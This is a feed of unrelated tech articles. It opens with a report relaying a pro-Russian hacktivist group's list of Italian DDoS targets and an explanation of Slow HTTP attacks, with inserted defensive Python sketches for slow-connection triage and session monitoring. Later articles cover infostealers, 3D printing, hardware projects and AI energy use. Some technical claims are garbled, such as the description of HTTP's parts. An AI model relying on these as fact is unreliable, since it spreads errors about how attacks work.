NoName057(16) Removed from Telegram! But “Reborn” Follows Immediately, With DDoS Attacks on Italy!
The Telegram channels of the pro-Russian hackers of NoName057(16) have been deleted by Telegram. But the activists immediately recreated new channels branded with the suffix “reborn”.
But that is not all: in their first posts on the new channels, they announce a new attack on Italian infrastructure using Distributed Denial-of-Service (DDoS) attacks, the product of the DDoSia project that they coordinate.
NoName057(16) is a group of hackers that declared itself in March 2022 in support of the Russian Federation. They have claimed responsibility for cyberattacks on countries such as Ukraine, the United States and various other European countries. Below is the message from today’s post on their new Telegram channel.
Crushing Italy's internet infrastructure
❌Italian investment bank Mediobanca Banca di Credito Finanziario SpA (closed by geo)
check-host.net/check-report/233b848ck43e
❌Benelli Armi S.p.A. is an Italian firearms manufacturer
check-host.net/check-report/233b883fk23
❌Nexi - Italian financial company
check-host.net/check-report/233b899aka73
❌Fiocchi Munizioni - The largest Italian ammunition manufacturer (closed for geo reasons)
check-host.net/check-report/233b8a88k5e4
❌Franchi - Italian firearms manufacturer
check-host.net/check-report/233b8be5k793
❌Danieli - international Italian company, supplier of equipment and plants for the metallurgical industry
check-host.net/check-report/233b8d24k48
What is a Distributed Denial of Service attack
A DDoS (Distributed Denial of Service) attack is a type of cyberattack in which a large number of requests are sent to a server or website from many different machines at the same time, in order to overload the server’s resources and make it inaccessible to its legitimate users.
These requests can be sent from a large number of devices infected with malware and controlled by a criminal organization, from a network of compromised computers called a botnet, or from other sources of illegitimate traffic. The goal of a DDoS attack is often to disrupt the online activities of an organization or company, or to force it to pay a ransom to restore access to its online services.
DDoS attacks can cause significant damage to an organization’s online activities, including prolonged downtime, data loss and reputational damage. To protect themselves against these attacks, organizations can adopt security measures such as limiting network traffic from suspicious sources, using DDoS protection services, or designing systems that are resilient to DDoS attacks.
It should be noted that DDoS attacks, although they cause a temporary disruption of service, have no impact on the Confidentiality and Integrity of data, only on its availability. Therefore, once the DDoS attack is over, the site resumes working exactly as before.
What is cyber hacktivism
Cyber hacktivism is a movement that uses computer hacking techniques to promote a political or social message. Hacktivists use their computer skills to carry out online actions such as unauthorized access to websites or computer networks, the dissemination of confidential information, or blocking the online services of a given organization.
The goal of cyber hacktivism is to raise public awareness of important issues such as freedom of expression, privacy, freedom of access to information or the fight against online censorship. Hacktivists may belong to organized groups or act individually, but in both cases they use their computer skills to create a social and political impact.
It is important to stress that cyber hacktivism should not be confused with cybercrime, that is, the practice of using hacking techniques for illicit purposes such as the theft of personal or financial data. While cybercrime is illegal, cyber hacktivism can be considered legitimate if it aims to bring important issues to public attention and to foster democratic debate. However, hacktivists’ actions can have legal consequences, and hacktivists can be prosecuted for their actions.
Who are the NoName057(16) hacktivists
NoName057(16) is a group of hackers that declared itself in March 2022 in support of the Russian Federation. They have claimed responsibility for cyberattacks on countries such as Ukraine, the United States and various other European countries. These attacks are typically carried out against government agencies, media and the websites of private companies.
Information about the attacks carried out by NoName057(16) is published in the Telegram messaging channel of the same name. According to Ukrainian media, the group is also involved in sending threatening letters to Ukrainian journalists. The hackers gained their popularity during a series of massive DDoS attacks on Lithuanian websites.
The DDoS attack techniques used by the group are mixed, with a preference for the “Slow HTTP attack”.
The “Slow HTTP Attack” technique
The “Slow HTTP Attack” (the full article is at this link) is a type of cyberattack that exploits a vulnerability in web servers. In this type of attack, the attacker sends many incomplete HTTP requests to the target server, with the aim of keeping connections to the server occupied for a prolonged period and preventing the site’s legitimate users from gaining access.
Specifically, the Slow HTTP attack exploits the way the HTTP protocol works, which provides that an HTTP request is made up of three parts: the request, the response and the message body. The attacker sends many incomplete HTTP requests in which the message body is sent very slowly or incompletely, blocking the connection and preventing the server from freeing the resources needed to serve other requests.
This type of attack is particularly difficult to detect and mitigate, because the requests look legitimate but take an excessive amount of time for the server to process. Slow HTTP attacks can cause very slow response times or server downtime, making it impossible to access the online services hosted on that system.
To protect themselves against these attacks, organizations can implement security solutions such as application firewalls (web application firewall, or WAF), limiting connections to the server, and using DDoS detection and mitigation systems.
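The sketch below is an added example, not code from the original article: it applies the mitigations just listed (request deadlines and per-source connection limits) to a snapshot of open connections, and it covers unfinished headers as well as the slowly sent body described above. The snapshot format, field names and thresholds are assumptions made for illustration.

```python
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Assumed thresholds, to be tuned per service; none of them come from the article.
HEADER_DEADLINE_S = 10.0    # time allowed to deliver the complete request headers
BODY_GRACE_S = 5.0          # body rate is judged only after this long
MIN_BODY_RATE_BPS = 500.0   # minimum sustained body upload rate (bytes/second)
MAX_SLOW_PER_SOURCE = 3     # slow connections tolerated from one source address

# Constructed snapshot of open connections (documentation addresses, RFC 5737).
# Columns: conn_id src_ip age_s headers_done_at_s body_bytes content_length
# headers_done_at_s is "-" while the request headers are still incomplete.
SAMPLE_SNAPSHOT = """\
c1 198.51.100.7 42.0 - 0 0
c2 198.51.100.7 38.5 - 0 0
c3 198.51.100.7 61.2 1.0 900 100000
c4 198.51.100.7 55.0 0.8 400 50000
c5 203.0.113.20 1.2 - 0 0
c6 203.0.113.20 8.0 0.1 4000000 8000000
c7 192.0.2.33 30.0 0.2 2048 2048
c8 192.0.2.33 25.0 - 0 0
"""


@dataclass(frozen=True)
class Conn:
    conn_id: str
    src_ip: str
    age_s: float                      # seconds since the connection was accepted
    headers_done_at: Optional[float]  # seconds after accept, None if unfinished
    body_bytes: int
    content_length: int


def parse_snapshot(text: str) -> list[Conn]:
    conns = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        cid, ip, age, hdr, body, clen = line.split()
        conns.append(Conn(cid, ip, float(age),
                          None if hdr == "-" else float(hdr),
                          int(body), int(clen)))
    return conns


def classify(c: Conn) -> str:
    """Return 'slow-headers', 'slow-body' or 'ok' for one open connection."""
    if c.headers_done_at is None:
        # Headers never terminated: the connection holds a worker without a request.
        return "slow-headers" if c.age_s > HEADER_DEADLINE_S else "ok"
    if c.body_bytes >= c.content_length:
        return "ok"  # full request received; any delay now is the server's own
    body_time = c.age_s - c.headers_done_at
    if body_time > BODY_GRACE_S and c.body_bytes / body_time < MIN_BODY_RATE_BPS:
        return "slow-body"
    return "ok"


def triage(text: str) -> dict:
    """Connections to close now, and sources that deserve a connection limit."""
    verdicts = {c.conn_id: (c.src_ip, classify(c)) for c in parse_snapshot(text)}
    drop = [cid for cid, (_, v) in verdicts.items() if v != "ok"]
    per_source = Counter(ip for ip, v in verdicts.values() if v != "ok")
    throttle = sorted(ip for ip, n in per_source.items() if n > MAX_SLOW_PER_SOURCE)
    return {"drop": drop, "throttle_sources": throttle, "verdicts": verdicts}


if __name__ == "__main__":
    result = triage(SAMPLE_SNAPSHOT)
    print("close:", result["drop"])
    print("limit:", result["throttle_sources"])
```

A single slow connection (c8) is closed without penalising its source, since a lone stalled client is usually just a bad network path.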
The article “NoName057(16) Removed from Telegram! But “Reborn” Follows Immediately, With DDoS Attacks on Italy!” comes from il blog della sicurezza informatica.
MIT Demonstrates Fully 3D Printed, Active Electronic Components
One can 3D print with conductive filament, and therefore plausibly create passive components like resistors. But what about active components, which typically require semiconductors? Researchers at MIT demonstrate working concepts for a resettable fuse and logic gates, completely 3D printed and semiconductor-free.
Now just to be absolutely clear — these are still just proofs of concept. To say they are big and perform poorly compared to their semiconductor equivalents would be an understatement. But they do work, and they are 100% 3D printed active electronic components, using commercially-available filament.
How does one make a working resettable fuse and transistor out of such stuff? By harnessing thermal expansion, essentially.
The conductive filament the researchers used is Electrifi by Multi3D, which is PLA combined with copper micro-particles. A segment printed in this filament is normally very conductive due to the densely-packed particles, but as temperature increases (beginning around 40° C) the polymer begins to soften and undergoes thermal expansion. This expansion separates the copper particles, causing a dramatic increase in electrical resistance as electrical pathways are disrupted. That’s pretty neat, but what really ties it together is that this behavior is self-resetting, and reversible. As long as the PLA isn’t straight up melted (that is to say, avoids going over about 150° C) then as the material cools it contracts and restores the conductive pathways to their original low-resistance state. Neat!
So where does the heat required come from? Simply passing enough current through the junction will do the job. By carefully controlling the size and shape of traces (something even hobbyist filament-based 3D printers are very good at) this effect can be made predictable and repeatable.
The simpler of the two test components uses the resistance spike as a self-resetting fuse. The printed component is designed such that current above a threshold triggers a surge in resistance, preventing damage to some theoretical circuitry downstream. As long as the component is not destroyed by heating it to the point that it melts, it self-resets as it cools.
The transistor is a bit more interesting. By designing two paths so that they intersect each other, one can be used as a control path and the other as a signal path. Applying a voltage to the control path electrically controls the resistance of the signal path, effectively acting as a transistor. Researchers combined these basic transistors into NOT, AND, and OR gates. One is shown here.
This whole system is scalable, low-cost, and highly accessible to just about anyone with some basic equipment. Of course, it has some drawbacks. The switching speed is slow (seconds rather than nanoseconds) and being thermally-driven means power consumption is high. Still, it’s pretty nifty stuff. Check out the research paper for all the nitty-gritty details.
We’ve seen 3D printed triboelectric generators so it’s pretty exciting to now see printed active electronic components. Maybe someday they can be combined?
Infostealer: When One Wrong Click Makes You Sell US National Security for Just 10 Dollars!
Billions of dollars, advanced technologies and the strictest security protocols: none of this protected American military facilities and defense companies from the most common cybercrimes.
The Hudson Rock study shows that dozens of employees of major defense contractors, including Lockheed Martin and Boeing, as well as US Army and Navy personnel, have been infected by infostealers. Credentials, VPN sessions, e-mail and even access to closed procurement systems are now in the hands of cybercriminals.
All it takes is an accidental download of an infected file onto your computer: a game key generator, a cracked program or a trojanized PDF document is enough to install an infostealer. Once installed, the malware collects everything, from passwords to browser history to files from the work computer. The data is then sold on the darknet. The average price for full access to the work computer of an employee of a military company with sensitive data is just 10 dollars.
This type of attack has proven extremely effective. According to the data collected, more than 30 million computers have been infected in recent years. Of these, about 20% contained corporate accounts, including those of companies that work with US national security.
Active session cookies are particularly dangerous, because they allow criminals to access protected systems instantly without having to enter a username and password. Not even multi-factor authentication (MFA) will help if an attacker manages to get hold of a user’s active session.
The Honeywell example shows the scale of the problem. Since 2024, 56 corporate accounts have been stolen from 398 employees of the company, including access to the internal SAP, Bitbucket and SharePoint systems. In addition, logins to third-party services were leaked: Microsoft, Cisco and SAP.
But the real threat goes well beyond the sphere of private business. The victims included members of the US Navy whose access to Citrix, OWA, Confluence and even military training platforms ended up in the hands of attackers. This opens the door to attacks against critical military installations. Experts stress that if such data were to end up in the hands of hostile countries, the information obtained could be used to penetrate deep into military infrastructure.
List of companies whose employees fell victim to infostealers (Hudson Rock)
The main protective measures include:
- A ban on using personal devices for work: many infections occur through computers used for both personal and work activities;
- A strict software download policy: use only licensed software;
- Multi-level authentication with continuous session monitoring: if session cookies are stolen, they must be promptly deleted;
- Constant monitoring of data leaks on the darknet: companies must monitor leaks of their employees’ data.
Hudson Rock acknowledges that infostealers are no longer just a criminal hacking tool, but a threat to national security. Even companies and organizations that maintain strict cybersecurity standards become victims because of the vulnerabilities of their contractors and partners. The question is not whether leaks can be prevented, but how quickly they can be detected and neutralized.
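As an added illustration of the “continuous session monitoring” measure above (not code from the article or from Hudson Rock), the following sketch re-checks the context of a session cookie on every request and invalidates it server-side when it shows up from two networks at once, or when the account appears in a leak feed. The class, method names, window length and sample events are assumptions.

```python
from __future__ import annotations

import hashlib
import ipaddress
from dataclasses import dataclass, field
from typing import Optional

# Assumed policy value: the same cookie alternating between two networks
# within this window is treated as concurrent use from two places.
INTERLEAVE_WINDOW_S = 600


def network_of(ip: str) -> str:
    """Coarse client location: /24 for IPv4, /48 for IPv6."""
    addr = ipaddress.ip_address(ip)
    prefix = 24 if addr.version == 4 else 48
    return str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))


def ua_fingerprint(user_agent: str) -> str:
    return hashlib.sha256(user_agent.encode("utf-8")).hexdigest()[:16]


@dataclass
class Session:
    user: str
    ua: str
    history: list = field(default_factory=list)  # (timestamp, network), oldest first
    revoked_reason: Optional[str] = None


class SessionMonitor:
    """Server-side session store that re-checks context on every request."""

    def __init__(self):
        self.sessions = {}

    def login(self, sid, user, ip, user_agent, now):
        # Called only after password + MFA succeeded; records the baseline context.
        self.sessions[sid] = Session(user, ua_fingerprint(user_agent),
                                     [(now, network_of(ip))])

    def revoke_user(self, user, reason):
        """Kill every live session of a user, e.g. once the account is seen in a leak feed."""
        hit = [sid for sid, s in self.sessions.items()
               if s.user == user and s.revoked_reason is None]
        for sid in hit:
            self.sessions[sid].revoked_reason = reason
        return hit

    def observe(self, sid, ip, user_agent, now):
        """Return 'allow', 'step_up' (ask for MFA again), 'revoke' or 'reauth'."""
        s = self.sessions.get(sid)
        if s is None or s.revoked_reason is not None:
            return "reauth"  # a revoked cookie is worthless, whoever presents it
        if ua_fingerprint(user_agent) != s.ua:
            # Weak signal on its own (the header can be copied), but cheap to check.
            s.revoked_reason = "user-agent changed"
            return "revoke"
        net = network_of(ip)
        last_net = s.history[-1][1]
        recent = {n for t, n in s.history if now - t <= INTERLEAVE_WINDOW_S}
        s.history.append((now, net))
        if net == last_net:
            return "allow"
        if net in recent:
            # A -> B -> A inside the window: the cookie is live in two places.
            s.revoked_reason = "interleaved networks"
            return "revoke"
        return "step_up"


def replay(monitor, events):
    """Feed (sid, ip, user_agent, timestamp) tuples and collect the verdicts."""
    return [monitor.observe(*e) for e in events]


# Constructed traffic for one session (documentation addresses, made-up agents).
SAMPLE_EVENTS = [
    ("s1", "192.0.2.77", "UA-office", 60),     # same /24 as login
    ("s1", "198.51.100.5", "UA-office", 120),  # new network appears
    ("s1", "192.0.2.10", "UA-office", 180),    # original network still active
    ("s1", "192.0.2.10", "UA-office", 200),    # cookie already revoked
]

if __name__ == "__main__":
    m = SessionMonitor()
    m.login("s1", "alice", "192.0.2.10", "UA-office", 0)
    print(replay(m, SAMPLE_EVENTS))
```

A user who hops between two networks inside the window is also logged out; the cost is one extra login, which is the trade-off this policy accepts.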
The article “Infostealer: When One Wrong Click Makes You Sell US National Security for Just 10 Dollars!” comes from il blog della sicurezza informatica.
Belfry OpenSCAD Library (BOSL2) Brings Useful Parts and Tools Aplenty
OpenSCAD has a lot of fans around these parts — if you’re unaware, it’s essentially a code-based way of designing 3D models. Instead of drawing them up in a CAD program, one writes a script that defines the required geometry. All that is made a little easier with the Belfry OpenSCAD Library (BOSL2).
Designing a part like this is a cinch with BOSL2.
BOSL2 has an extensive library of base shapes, advanced functions for manipulating models, and some really nifty tools for creating attachment points on parts and aligning components with one another. If that sounds handy for designing useful objects, you’re in for even more of a treat when you see their functions for gears, hinges, screws, and more.
There’s even one that covers bottle necks and caps. (Those are all standardized by the way, so it’s never been easier to interface to existing bottles or caps in a project.)
OpenSCAD really is very versatile software. It powers useful tools like this screw, washer, and nut generator as well as having more unusual applications like a procedural terrain generator. It’s free, so if you’ve never looked into it, check it out!
Vacuum Forming With 3D Printed Moulds And Sheets
Vacuum forming is perhaps one of the less popular tools in the modern maker arsenal, something which surprises us a bit because it offers many possibilities. We’ve created our own vacuum forms on 3D printed moulds for ages, so it’s interesting to see [Pisces Printing] following the same path. But what you might not realize at first is that the vacuum forming sheets themselves are also 3D printed.
The full video is below the break, and in it he details making a mould from PETG, and in particular designing it for easy release. The part he’s making is a belt guard for a table top lathe, and the PETG sheet he’s forming it from is also 3D printed. He makes the point that it’s by no means perfect, for example he shows us a bit of layer separation, but it seems promising enough for further experimentation. His vacuum forming setup seems particularly small, which looks as though it makes the job of making a sheet somewhat simpler.
The cost of a vacuum forming sheet of whichever polymer is hardly high, so we can’t see this technique making sense for everyday use. But as we’ve seen in previous experiments, the printed sheets do make it easy to add color and texture to the final product, which obviously adds some value to the technique.
youtube.com/embed/lTR3ZY2X1Rk?…
Thanks [Tomas Harvie Mudrunka] for the tip.
A Unique Linear Position Sensor Using Magnetostriction
To the extent that you’re familiar with magnetostriction, you probably know that it’s what makes big transformers hum, or that it’s what tips you off if you happen to walk out of a store without paying for something. But magnetostriction has other uses, too, such as in this clever linear position sensor.
Magnetostriction is just the tendency for magnetic materials to change size or shape slightly while undergoing magnetization, thanks to the tiny magnetic domains shifting within the material while they’re aligning. [Florian B.]’s sensor uses a side effect of magnetostriction known as the Wiedemann effect, which causes a wire to experience a twisting force if a current pulse is applied to it in a magnetic field. When the current pulse is turned off, a mechanical wave travels along the wire to a coil, creating a signal. The difference in time between sending the pulse and receiving the reflection can be used to calculate the position of the magnet along the wire.
To turn that principle into a practical linear sensor, [Florian B.] used nickel wire stretched tightly down the middle of a PVC tube. At one end is a coil of copper magnet wire, while the other end has a damper to prevent reflections. Around the tube is a ring-shaped cursor magnet, which can move up and down the tube. An exciter circuit applies the current pulse to the wire, and an oscilloscope is used to receive the signal from the wire.
This project still appears to be in the prototype phase, as evidenced by the Fischertechnik test rig. [Florian] has been working on the exciter circuit most recently, but he’s done quite a bit of work on optimizing the cursor magnet and the coil configuration, as well as designs for the signal amplifier. It’s a pretty neat project, and we’re looking forward to updates.
If you need a deeper dive into magnetostriction, [Ben Krasnow] points the way.
Auto-Download Your Kindle Books Before February 26th Deadline
With the news that Amazon will no longer be allowing users to download their Kindle books after February 26th, many are scrambling to download their books before it’s too late. The most up-to-date project for automating this process appears to be Amazon Kindle Bulk Downloader.
As the company that famously removed 1984 from thousands of devices without users’ permission, this is a move that shouldn’t be surprising, but is still disappointing, especially for those of us that were somewhat early adopters of ebooks with Kindles that don’t have a WiFi connection. (Yes, you can tell us about how you bought a Sony reader before the Kindle even came out in the comments.)
The TypeScript-coded tool runs inside bun which can be installed in any of the big three OSes and even has a handy Docker image if that’s more your speed. Whether you use this tool or not, if you have any Kindle books we’d implore you to download them now.
Once you’ve downloaded those books, how about cracking the DRM either with LEGO or with software like Calibre? You could load it on a completely Open Source Reader then.
Let There Be Light: The Engineering of Optical HDMI
In a recent video, [Shahriar] from The Signal Path has unveiled the intricate design and architecture of optical HDMI cables, offering a cost-effective solution to extend HDMI 2.0 connections beyond the limitations of traditional copper links. This exploration is particularly captivating for those passionate about innovative hardware hacks and signal transmission technologies.
[Shahriar] begins by dissecting the fundamentals of HDMI high-speed data transmission, focusing on the Transition Minimized Differential Signaling (TMDS) standard. He then transitions to the challenges of converting from twisted-pair copper to optical lanes, emphasizing the pivotal roles of Vertical-Cavity Surface-Emitting Lasers (VCSELs) and PIN photodiodes. These components are essential for transforming electrical signals into optical ones and vice versa, enabling data transmission over greater distances without significant signal degradation.
A standout aspect of this teardown is the detailed examination of the optical modules, highlighting the use of free-space optics and optical confinement techniques with lasers and detectors. [Shahriar] captures the eye diagram of the received high-speed lane and confirms the VCSELs’ optical wavelength at 850 nm. Additionally, he provides a microscopic inspection of the TX and RX chips, revealing the intricate VCSEL and photodetector arrays. His thorough analysis offers invaluable insights into the electronic architecture of optical HDMI cables, shedding light on the complexities of signal integrity and the innovative solutions employed to overcome them.
For enthusiasts eager to take a deeper look into the nuances of optical HDMI technology, [Shahriar]’s comprehensive teardown serves as an excellent resource. It not only gives an insight into the components and design choices involved, but also inspires further exploration into enhancing data transmission methods.
youtube.com/embed/O9QPecpLcnA?…
Hackaday Europe 2025: Speakers, Lightning Talks, and More!
If you’ve been waiting for news from our upcoming Hackaday Europe event in March, wait no longer. We’re excited to announce the first slice of our wonderful speakers lineup! Get your tickets now.
Hackaday Europe is going down again in Berlin this year on March 15th and 16th at MotionLab. It’s Hackaday, but in real life, and it’s too much fun. The badge is off-the-scale cool, powered by the incredible creativity of our community who entered the Supercon SAO contest last fall, and we’re absolutely stoked to be tossing the four winning entries into your schwag bag in Europe.
If you already know you’ll be attending and would like to give a seven-minute Lightning Talk on Sunday, we’re also opening up the call for talks there. Tell us now what you’d like to talk about so we can all hear it on Sunday morning.
We’re looking forward to the talks and to seeing you all there! We’re getting the last few speakers ironed out, have a keynote talk to announce, and, of course, will open up workshop signups. So stay tuned!
Bunnie Huang
Seeing Through Silicon with IRIS Imaging
IRIS (InfraRed, In-Situ) is a technique for imaging silicon chips in CSP-type packages without removing them from the circuit board. In this short talk, I’ll go over the basics of how the technique works, show a couple of ways to implement it, and share some images of chips.
Sera Evcimen
Hardware Startup/Product Pitfalls
This talk is designed to demystify what causes failures and help hardware startups and innovation projects navigate the complex journey of hardware development by identifying and avoiding common pitfalls. With a focus on providing some examples and actionable strategies, it aims to equip teams to overcome challenges and build a strong foundation for success.
Erik Bosman
Creating light sculptures for fun and, … mostly for fun.
This talk will be about solving interesting problems that I created for myself in the process of creating light sculptures:
– Calculating polyhedral shapes
– Turning those into laser-cut pieces, or oddly-shaped PCBs
– Various methods of routing and driving LEDs
– and creating software that takes advantage of the sculptural nature of the light installation.
Niklas Roy
Vectors, Pixels, Plotters and Public Participation
In his talk, Niklas will highlight some of his latest projects that use DIY machines to involve communities in creating art together. From a graffiti robot to a giant mosaic that was designed by an entire neighborhood with the help of a mobile arcade machine, he’ll share the stories behind his inventions. He will discuss his sources of inspiration, the creative process and thoughts about inclusiveness guiding the development of the machines, and the joy of watching diverse people interact with and contribute to these unconventional art pieces.
Daniel Büchele and Andre Zibell
Developing a NFC-based decentralized payment system for a music festival
For a small volunteer-run music festival we designed and built a custom decentralized NFC payment system. Due to the nature of the festival, the design of the system and hardware had some unique requirements: It had to be fully decentralized and not rely on network connection, which created some interesting security challenges. We also developed custom hardware terminals (based on ESP32) to be used at point-of-sale.
Andy Geppert, Anders Nielsen, and Pierre Muth
The Core64 – NeonPixels – 65uino collaboration
Join us to learn how three unique Hackaday projects came together to create something new for 1975, thanks to international collaboration. (Yes, that’s 50 years ago!)
Alun Morris
Half-size Hacking: 0.05″ Matrix Boards Under the Microscope
How do you make a prototype really tiny without designing a PCB? What you need to get started. How do you connect to standard modules with 0.1″ headers? And the world’s smallest multi-channel voltmeter.
Daniel Dakhno
Hacking a pinball machine
This talk explains how we modernized a classic pinball machine by replacing the mechanical guts with a Raspberry Pi, multiple STM32, and a CAN bus, creating infrastructure that can be exploited far beyond the realm of our project.
It Works For Locomotives, Why Not Series Hybrid Semi-Trucks?
The current Edison Motors semi-truck prototype. (Credit: Edison Motors)
Canadian start-up Edison Motors may not seem like much at first glance — consisting of fewer than two dozen people in a large tent — but their idea of bringing series hybrid technology to semi-trucks may just have wheels. The concept and Edison Motors’ progress is explained in a recent video by The Drive on Youtube, starting off with the point that diesel-electric technology is an obvious fit for large trucks like this. After all, it works for trains.
In a series hybrid, there are two motors: a diesel generator and an electric motor (diesel-electric). This was first used in ships in the 1900s and would see increasing use in railway locomotives starting in the early 20th century. In the case of Edison Motors’ current prototype design there is a 9.0 liter Scania diesel engine which is used solely as a generator at a fixed RPM. This is a smaller engine than the ~15 liter engine in a conventional configuration and also doesn’t need a gearbox.
Compared to a battery-electric semi-truck, like the Tesla Semi, it weighs far less. And unlike a hydrogen-fuel cell semi-truck it actually exists and doesn’t require new technologies to be invented. Instead a relatively small battery is kept charged by the diesel generator and power fed back into the battery from regenerative braking. This increases efficiency in many ways, especially in start-stop traffic, while not suffering a weight penalty from a heavy battery pack and being able to use existing service stations, and jerry cans of diesel.
In addition to full semi-trucks Edison Motors also works on conversion kits for existing semi-trucks, pick-up trucks and more. Considering how much of the North American rolling stock on its rail systems is diesel-electric, it’s more amazing that it would have taken so long for the same shift to series hybrid on its road. Even locomotives occasionally used direct-drive diesel, but the benefits of diesel-electric hybrids quickly made that approach obsolete.
youtube.com/embed/dBMguDfirgA?…
Hack On Self: One Minute Blitz
Have you yet stumbled upon the principle of “consistently applied small amounts of work can guarantee completion of large projects”? I have, and it’s worked out well for me – on days when I could pay attention to them, that is.
A couple times, I’ve successfully completed long-term projects by making sure to do only a little bit of it, but I do it every day. It helps a lot with the feeling you get when you approach a large project – say, cleaning up your desk after a few days of heavy-duty hacking. If you’re multi-discipline, and especially if you happen to use multiple desks like me, a desk can stay occupied for a while.
Can you do one minute of desk cleaning today? Sure doesn’t feel like much time, or much effort. In a week’s time, however, you might just have a clean desk. Cleaning discrete messes is where this concept applies pretty well – you couldn’t wash floors like this, but you could wipe off the dust from a few surfaces for sure.
Now, I want to make this a habit – use it on like, seven different things a day. I wrote a script to make it possible – here’s how it works for me right now.
Building Upon The Seen-Before
I relied on a few previously-discussed things for this one. Main one is the Headphone Friend project – a pocketable Linux device, streaming audio from my laptop as I walk around my room. As a reminder, the headphones also have a button that emits HID events when pressed/released, and I have a small piece of software that can map actions to combinations of short-medium-long presses of that button.
Another necessity was a bit of software – dodging my questing system “away from laptop = system breaks” mistake, I wanted to put everything into my headphones, even the task names, trying to reach a “flow” through a series of 1-minute tasks. Of course, I reused the old sound library, but I also needed TTS generation on the fly! I went for PicoTTS with a simple wrapper – it’s not the best TTS system, but it’s damn fast, and perfectly suited for a prototype.
For the button-to-action mapping script, I had to expose some sort of API, to avoid merging the button scanning code and the task switching code. After a little deliberation, I picked websockets – they work decently well, and they’re quite portable, so I could run the button monitoring itself on the Headphone Friend device, and the main software on my laptop, for prototyping purposes.
Now, the more interesting question – how do I build the algorithm?
Can Be More, Can’t Be Less
The main thing about the one-minute timers like these is that you can spend longer on the task if you really get into it, you just can’t spend less than one minute. So, the one-minute upper bound is not enforced – only the lower bound is, really, which means that a “next task” button is a requirement.
At the script’s core, I wrote a little state machine describing the “sprints”, and tied my tiny notification-sound-playback library into it. It goes through the five tasks I’ve defined, making a little “beep” after a minute has passed, and waiting for me to press the “next” keypress signaling that I’m done with the task. After five tasks are done, it stops, and waits for the “start” magic keypress sequence – maybe the next sprint is tomorrow, maybe it’s a couple days later, but I get there eventually.
So far, I’ve only had to modify the code a little bit – each task now has a name in the system, but also an actually TTS-pronounceable string, since the picoTTS model does mis-pronounce here and there. Other than that, the very simple prototype works. I’ve tried to upgrade it from picoTTS, compiling piper that can do a good few different voices and languages, but I’ve been firmly stuck on cmake intricacies so far.
Middle-Of-Project Lull
Currently, I’m starting with five tasks – kitchen counter cleaning, hardware desk cleaning, sorting the clothes (in whichever way they need sorting), and cleaning the floors in two rooms. That makes for five minutes minimum, and oftentimes, it’s really just five minutes – to me, feels like it’s important not to get into the flow too much, otherwise the five-minute blitz might become a twenty-minute one, and it gets into “kind of a bother to do” mental territory.
The result is, my cooking and hacking surfaces are a little cleaner and more ready to go on average, and it’s easier to get clothes washing done if there isn’t an unsorted pile to deal with already. I think I most enjoy the movement of it – it’s become a nice way to spend 5-10 minutes moving around the house, breaking the rut. I do need to add some sort of “stop”/“pause” mechanism – sometimes I get too involved in a particular task and could really use a break. My state machine isn’t yet involved enough for this, and maybe soon this might need an overhaul.
At the moment, I’m also looking to tie this into my questing system – I haven’t attached logging to this one yet, but since the questing system includes that, it’d be a two-birds-with-one-stone approach. For the questing system, I’m still using the text file backend, which does limit things, but I’ve been meaning to add external action support to it anyway – tying task completion to quest progression is a no-brainer!
Currently, this script and I are in the honeymoon phase: it’s working but I’m waiting for it to fail in more ways, and seeing whether it survives long-term. Based on lessons I’ve been trying to pull from the questing system, I’m trying not to overstretch it – five tasks is enough. For now, it’s pretty nice to be on the island of success in a sea of older solutions that withered away. This time, I’m writing before the full end-conclusion phase, because it’s nice and reassuring when projects work out, and I’d just like to share in that a little bit.
How Much Energy Does OpenAI’s ChatGPT Consume? An Epoch AI Study Finds Out
The energy consumption of artificial intelligence has long been a subject of debate. ChatGPT has also been criticized more than once: it was previously estimated that each request requires about 3 watt-hours of electricity, or 10 times the cost of a request to Google. However, new research by Epoch AI has refuted this figure.
According to Epoch AI, the average ChatGPT query using the GPT-4o model consumes only about 0.3 watt-hours. This means that a question put to the AI requires less electricity than most household appliances. For example, a 10 W LED bulb consumes the same amount of energy in 6 minutes of operation.
Comparison of per-query energy consumption in ChatGPT with household appliances (Epoch AI)
The difference in the estimates is due to outdated data. Earlier studies were based on the assumption that less efficient server processors were being used. In recent years, however, computing infrastructure has improved considerably: new models run on more energy-efficient chips, and algorithms have become less costly. As a result, the load on the power grid turned out to be much lower than previously thought.
The question of AI’s future energy consumption nevertheless remains open. Despite efficiency gains, OpenAI and other companies continue to increase their computing power. According to the Rand report, over the next two years data centers could consume almost the entire 2022 capacity of California’s power grid (68 GW). By 2030, training an advanced AI model could consume up to 8 GW, the equivalent of running eight nuclear reactors.
An additional burden comes from new AI architectures, in particular so-called reasoning models. Unlike GPT-4o, which responds almost instantly, such systems take seconds or even minutes to “think” before producing a result. This makes them more powerful, but also increases energy consumption. OpenAI has already begun releasing more energy-efficient versions of such models, such as o3-mini, but experts doubt that the efficiency improvements will offset the growing demand.
Energy consumption is becoming not only a technological issue but also a political one. Last week, more than 100 organizations signed an open letter calling on regulators to oversee the construction of new data centers. It stresses that the growth of computing power could lead to a shortage of energy resources and an increase in the share of fossil fuels in the energy mix.
For now, the only way to reduce the load on the power grid is through smart use of the technology. Epoch AI advises users who want to minimize their “digital carbon footprint” to choose versions of the models that require fewer resources. However, given the growing popularity of AI, this option is more temporary than long-term.
The article “How Much Energy Does OpenAI’s ChatGPT Consume? An Epoch AI Study Finds Out” comes from il blog della sicurezza informatica.
Give Your Animal Crossing Villagers the Gift of Linux
If you’ve played any of the versions of Nintendo’s Animal Crossing over the years, you’ll know that eventually you get to the point where you’ve maxed out your virtual house and filled it with all the furniture you could possibly want — which is arguably as close to “winning” the game as you can get.
But now thanks to the work of [decrazyo] there’s a piece of furniture that you can add to your Animal Crossing house that will never get old: an x86 emulator that boots Linux. As explained in the video below, this trick leverages the fact that Nintendo had already built a highly accurate Nintendo Entertainment System (NES) emulator into Animal Crossing on the GameCube, which could be used to run a handful of classic games from within the player’s virtual living room. But it turns out that you can get that emulator to load a user-provided ROM from the GameCube’s memory card, which opens the doors to all sorts of mischief.
In this case, all [decrazyo] had to do was prepare an NES ROM that booted into Linux. That might seem like a tall order, but considering he had already worked on a port of Unix to the classic console, it’s not like he was going in blind. He identified the minimal Embeddable Linux Kernel Subset (ELKS) as his target operating system, but wanted to avoid the hassle of re-writing the whole thing for the 8-bit CPU in the NES. That meant adding another emulator to the mix.
